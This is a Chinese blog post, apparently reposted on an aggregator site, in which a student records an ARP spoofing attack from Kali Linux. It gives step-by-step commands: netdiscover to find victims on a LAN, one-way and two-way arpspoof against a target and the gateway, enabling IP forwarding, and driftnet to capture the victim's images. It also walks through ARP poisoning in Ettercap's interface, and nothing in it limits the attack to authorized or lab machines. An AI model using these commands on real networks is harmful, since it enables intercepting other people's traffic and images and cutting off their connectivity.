zoukankan      html  css  js  c++  java
  • kali进行arp嗅骗和攻击的一次记录

    由于本人打算考网络安全的专硕,所以这几天玩了一次kali。恩,怎么说呢,感触挺深的,特此记录下来

    arp基础

    在我们进行各种高大上的讲解的时候,我们要先清楚一点,我们如何在网上进行各种活动的。
    比如我们经常用的baidu,我们是如何访问到baidu的服务器的。

    我们可以通过追踪路由来弄清楚这个问题

    windows: tracert
    linux:traceroute

    通过运行上面的命令我们可以看出数据包的传输过程

    由于本人身处深山,所以网络查的可以,上面的图仅供参考

    我们可以看到,我们的探测数据包经过了很多路由的转发最终达到了我们的机器上

    并且,这里我们需要引出很重要的东西 -- 网关

    网关我们可以这么理解:
    相信大家家里都有有线网了吧,我们其实可以把网关看成我们的那个接入网络的光猫路由器。

    我们所有的数据包都是通过网关这个小东西传输。

    现在,重点来了!!!!

    敲黑板

    假如,我们在同一个局域网下面,有两台机器,一台是我们自己,一台是需要攻击的机器。

    那么,正常情况下,两台机器都有自己的ip地址 (192.168.x.x),进行自己正常的网络服务,但是如果我们告诉对方机器现在我就是路由器,而且如果我的机器不能进行端口转发的时候,对面的机器就进不去网了。

    需要注意的一点哈,现在我们告诉了对方机器我们是路由器,但是路由器还是可以给对面机器通信的。

    这一点可以重复上面的操作,就是告诉路由器我们就是对面机器,进行双向嗅探来解决。

    如何进行攻击

    命令行方法

    一、 获取对方信息

    由于这篇博客写的是内网渗透,所以,我们需要扫描当前网络下的其他机器

      > ifconfig
    

    先查看一下自己ip 里面重要的消息 有网卡和ip

    这里说明一点,一般的话网关的最后一位数字一般都是1

      > netdiscover -i [网卡] -r [网关/24]
      example:
      > netdiscover -i eth0 -r 192.168.3.1/24
    

    这样就可以获取对方ip,这里我只有一台电脑,我就不放图了

    二、开始进行嗅探

    arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
    
    > arpspoof -i eth0 [对方ip]  网关
    
    
    

    双向嗅探

      > arpspoof -i eth0 [对方ip]  网关
      > arpspoof -i eth0 [网关]  对方ip
    

    由于kali默认情况下是禁止端口转发的,所以现在的情况下对面机器是断网的

    开启端口转发

      echo 1> /proc/sys/net/ipv4/ipforward
    
    

    1是开启 0是关闭

    proc是目前开机的时候机器的配置,重启的话会重置

    抓取对面图片

      driftnet -i eth0
    
    

    软件嗅探

    具体做法

    sniff->unified sniffing

    host -> hostlist

    host -> scan for host

    网关IP add to target 1 靶机 add to target 2

    Mitm->ARP poisoning

    要记住选中第一项 第二项是单项ARP毒缓存 用于靶机会失败报警 单向欺骗网关

    开启driftnet

  • 相关阅读:
    iframe操作
    常用插件整理
    js原生的url操作函数,及使用方法。(附:下边还有jquery对url里的中文解码函数)
    espcms自定义表单邮件字段
    网页百度地图API相关资料
    css3 transition的各种ease效果
    点击按钮后延迟跳转
    js判断checkbox状态,处理表单提交事件
    js禁止网页使用右键
    jquery对url中的中文解码
  • 原文地址:https://www.cnblogs.com/adroitwolf/p/14309988.html
Copyright © 2011-2022 走看看